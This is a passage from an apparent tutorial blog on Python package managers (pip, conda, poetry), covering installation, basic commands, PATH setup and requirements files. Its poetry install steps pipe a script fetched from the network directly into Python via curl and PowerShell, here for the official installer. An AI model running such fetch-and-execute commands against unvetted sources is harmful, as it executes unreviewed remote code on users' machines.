&lt;p&gt;To check that pip has been installed, run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-pip"&gt;How to use pip&lt;/h5&gt;
&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 uninstall package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install --upgrade package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pip is one of the easier Python package managers to get started with. It is most likely pre-installed with Python and is simple to use. When you install a package with pip, it will also install any other packages that the desired package depends on. However, when you upgrade a package, pip may not automatically update all of its related dependencies, which can lead to conflicts.&lt;/p&gt;
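&lt;p&gt;One way to spot such conflicts is pip&amp;rsquo;s built-in &lt;code&gt;check&lt;/code&gt; command, which reports installed packages whose declared requirements are missing or incompatible. A short sketch, assuming &lt;code&gt;pip3&lt;/code&gt; is on your path:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Show installed packages and their versions
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 list
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Verify that installed packages have compatible dependencies
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 check || echo "Dependency conflicts found"
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If a conflict is reported, installing a specific version, for example &lt;code&gt;pip3 install "package_name==1.2.3"&lt;/code&gt; (a placeholder name and version), may help to resolve it.&lt;/p&gt;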
&lt;h4 id="conda"&gt;conda&lt;/h4&gt;
&lt;p&gt;While pip is excellent for most projects, there are cases when you may need a more comprehensive package manager like &lt;a href="https://docs.conda.io/en/latest/" rel="external"&gt;conda&lt;/a&gt;. Conda is primarily associated with &lt;a href="https://www.anaconda.com/" rel="external"&gt;Anaconda&lt;/a&gt; and &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;Miniconda&lt;/a&gt;, two Python distributions aimed at scientific computing and data science. Conda can manage not only Python packages but also non-Python libraries and binary packages, which it installs from conda channels rather than from PyPI. Furthermore, conda excels at handling dependencies and managing virtual environments (which will be discussed in a later blog post).&lt;/p&gt;
&lt;h5 id="how-to-install-conda"&gt;How to install conda&lt;/h5&gt;
&lt;p&gt;Conda can be installed in two ways: by installing either Anaconda or Miniconda. We will only consider installing Miniconda in this blog.&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="condaWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for Windows from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Run the installer and follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="condaMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for macOS or Linux from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open a terminal of your choice and navigate to the directory containing the downloaded installer&lt;/li&gt;
&lt;li&gt;Run the installer script:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zsh Miniconda3-latest-MacOSX-x86_64.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="condaLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for macOS or Linux from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open a terminal of your choice and navigate to the directory containing the downloaded installer&lt;/li&gt;
&lt;li&gt;Run the installer script:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bash Miniconda3-latest-Linux-x86_64.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;To check that conda has been installed, run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-conda"&gt;How to use conda&lt;/h5&gt;
&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda install package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda remove package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda update package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default, conda will give preference to packages that are included in the Anaconda distribution. If you need to install PyPI packages that are &lt;em&gt;not&lt;/em&gt; in the default conda distribution, you can install pip by running &lt;code&gt;conda install pip&lt;/code&gt;, then follow the pip instructions above. This will install a version of pip within your conda environment. You need to be careful when using pip inside conda; for more information, Anaconda have written a useful &lt;a href="https://www.anaconda.com/blog/using-pip-in-a-conda-environment" rel="external"&gt;blog post&lt;/a&gt; on the subject, including some best practices.&lt;/p&gt;
&lt;h4 id="poetry"&gt;poetry&lt;/h4&gt;
&lt;p&gt;Poetry is a modern and comprehensive Python package manager that combines dependency management and project packaging. It aims to simplify the workflow of managing dependencies and version control, making it an attractive choice for Python developers.&lt;/p&gt;
&lt;h5 id="how-to-install-poetry"&gt;How to install poetry&lt;/h5&gt;
&lt;p&gt;Installing poetry is slightly more involved than installing pip or conda, but thankfully the poetry developers have released a Python script to aid installation, which can be accessed at &lt;a href="https://install.python-poetry.org/" rel="external"&gt;install.python-poetry.org&lt;/a&gt;.&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="poetryWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;If you are comfortable using PowerShell, download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (Invoke-WebRequest -Uri https&lt;span style="color:#f85149"&gt;:&lt;/span&gt;//install.python-poetry.&lt;span style="color:#79c0ff"&gt;org&lt;/span&gt; -UseBasicParsing).&lt;span style="color:#79c0ff"&gt;Content&lt;/span&gt; | py -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Otherwise, copy and paste the content of the Python script from &lt;a href="https://install.python-poetry.org/" rel="external"&gt;install.python-poetry.org&lt;/a&gt; into a file called &lt;code&gt;get-poetry.py&lt;/code&gt; and run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; py get-poetry.&lt;span style="color:#79c0ff"&gt;py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;%APPDATA%\Python\Scripts&lt;/code&gt;. This directory needs to be added to your &lt;code&gt;PATH&lt;/code&gt; environment variable if it is not already there. You can find out how to edit the &lt;code&gt;PATH&lt;/code&gt; variable in this &lt;a href="https://www.computerhope.com/issues/ch000549.htm" rel="external"&gt;blog post&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;You may need to restart your machine before the &lt;code&gt;poetry&lt;/code&gt; command will work.&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="poetryMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Using your preferred terminal, download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sSL https://install.python-poetry.org | python3 -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;$HOME/.local/bin&lt;/code&gt;. This path needs to be added to your &lt;code&gt;$PATH&lt;/code&gt; if it has not already been added. To do this, open your shell configuration file in vim:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vim ~/.zshrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Press &lt;code&gt;i&lt;/code&gt; (to enter insert mode) and add the following line to the file. The trailing &lt;code&gt;:$PATH&lt;/code&gt; keeps the directories that are already on your path:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; export &lt;span style="color:#79c0ff"&gt;PATH&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/.local/bin:&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$PATH&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Press &lt;code&gt;Esc&lt;/code&gt; and then enter &lt;code&gt;:wq&lt;/code&gt; (which saves the file and quits vim).&lt;/p&gt;
&lt;ol start="3"&gt;
&lt;li&gt;Finally, to make the &lt;code&gt;poetry&lt;/code&gt; command available in your current terminal session, run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; source ~/.zshrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="poetryLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Using your preferred terminal, download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sSL https://install.python-poetry.org | python3 -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;$HOME/.local/bin&lt;/code&gt;. This path needs to be added to your &lt;code&gt;$PATH&lt;/code&gt; if it has not already been added. To do this, open your shell configuration file in vim:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vim ~/.bashrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Press &lt;code&gt;i&lt;/code&gt; (to enter insert mode) and add the following line to the file. The trailing &lt;code&gt;:$PATH&lt;/code&gt; keeps the directories that are already on your path:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; export &lt;span style="color:#79c0ff"&gt;PATH&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/.local/bin:&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$PATH&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Press &lt;code&gt;Esc&lt;/code&gt; and then enter &lt;code&gt;:wq&lt;/code&gt; (which saves the file and quits vim).&lt;/p&gt;
&lt;ol start="3"&gt;
&lt;li&gt;Finally, to make the &lt;code&gt;poetry&lt;/code&gt; command available in your current terminal session, run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; source ~/.bashrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
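&lt;p&gt;On macOS and Linux, the &lt;code&gt;$PATH&lt;/code&gt; step can also be written so that it is safe to run more than once. The snippet below is a minimal sketch rather than part of the official poetry instructions: it assumes the installer used the default &lt;code&gt;$HOME/.local/bin&lt;/code&gt; location, and the variable name &lt;code&gt;POETRY_BIN&lt;/code&gt; is purely illustrative.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Default location of the poetry wrapper (POETRY_BIN is an illustrative name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;POETRY_BIN=&amp;#34;$HOME/.local/bin&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Prepend the directory only if it is not already listed in PATH
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;case &amp;#34;:$PATH:&amp;#34; in
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  *&amp;#34;:$POETRY_BIN:&amp;#34;*) ;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  *) export PATH=&amp;#34;$POETRY_BIN:$PATH&amp;#34; ;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;esac
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Placed in &lt;code&gt;~/.zshrc&lt;/code&gt; or &lt;code&gt;~/.bashrc&lt;/code&gt;, these lines only prepend the directory when it is missing, so sourcing the file repeatedly does not keep lengthening &lt;code&gt;$PATH&lt;/code&gt;.&lt;/p&gt;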
&lt;p&gt;To check that poetry has been installed correctly, run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-poetry"&gt;How to use poetry&lt;/h5&gt;
&lt;p&gt;First you need to create a new project:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry new project_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry remove package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry update package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="package-management-in-project-workflows"&gt;Package Management in Project Workflows&lt;/h3&gt;
&lt;p&gt;Python package managers are a critical component of project workflows and can be used in various ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Setting up development environments:&lt;/strong&gt; Package managers help developers create consistent development environments across different machines by specifying the package version numbers. In pip this takes the form of a &lt;code&gt;requirements.txt&lt;/code&gt; file, in conda an &lt;code&gt;environment.yml&lt;/code&gt; file, and in poetry a &lt;code&gt;pyproject.toml&lt;/code&gt; file (which holds project metadata as well as the list of Python packages).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuous Integration (CI) and Deployment:&lt;/strong&gt; Package managers facilitate the installation of dependencies in CI systems and deployment servers, ensuring that the application runs as expected in these environments.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Version Control:&lt;/strong&gt; Similar to setting up a development environment, by including a &lt;code&gt;requirements.txt&lt;/code&gt;, &lt;code&gt;environment.yml&lt;/code&gt; or &lt;code&gt;pyproject.toml&lt;/code&gt; file in version control systems like Git, developers can ensure that collaborators and other team members have the same environment setup.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Creating and using these files is pretty straightforward. Let&amp;rsquo;s take a look at how to do this in pip, conda and poetry.&lt;/p&gt;
&lt;h4 id="pip-1"&gt;pip&lt;/h4&gt;
&lt;p&gt;When using pip, it is easy to create a requirements file. All you need to do is run the following command in the terminal.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 freeze &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will produce a file whose content looks similar to the example below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;flake8&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;4.0.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;numpy&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;1.25.2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;pandas&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;2.1.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scikit-learn&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;1.3.0
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pip freeze&lt;/code&gt; produces a list of all the packages you have installed, including their dependencies, together with the version of each package. This list is written to a file called &lt;code&gt;requirements.txt&lt;/code&gt; by using the &lt;code&gt;&amp;gt;&lt;/code&gt; operator to redirect the output of &lt;code&gt;pip freeze&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To install all the packages at the versions listed in a requirements file, run the following command in the terminal from the directory that contains the file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is the same command we used earlier to install a single package, but with the &lt;code&gt;-r&lt;/code&gt; flag, which tells pip to read the package names and versions from &lt;code&gt;requirements.txt&lt;/code&gt;.&lt;/p&gt;
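&lt;p&gt;Because the purpose of a requirements file is to record exact versions, it can be worth checking that every entry is pinned with &lt;code&gt;==&lt;/code&gt; before sharing it. The following is a minimal sketch, not a pip feature: the function name &lt;code&gt;unpinned_requirements&lt;/code&gt; is made up for this example, and it assumes a simple file with one requirement per line.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# List requirement lines that are not pinned to an exact version with ==
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# (unpinned_requirements is an illustrative helper, not a pip command)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;unpinned_requirements() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  # Drop blank lines and full-line comments, then keep lines lacking ==
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  grep -Ev &amp;#39;^[[:space:]]*(#|$)&amp;#39; &amp;#34;$1&amp;#34; | grep -v &amp;#39;==&amp;#39; || true
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running &lt;code&gt;unpinned_requirements requirements.txt&lt;/code&gt; prints nothing when every package is pinned, which is always the case for a file written by &lt;code&gt;pip freeze&lt;/code&gt; from packages installed from PyPI; hand-edited files are where unpinned entries tend to creep in.&lt;/p&gt;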
&lt;h4 id="conda-1"&gt;conda&lt;/h4&gt;
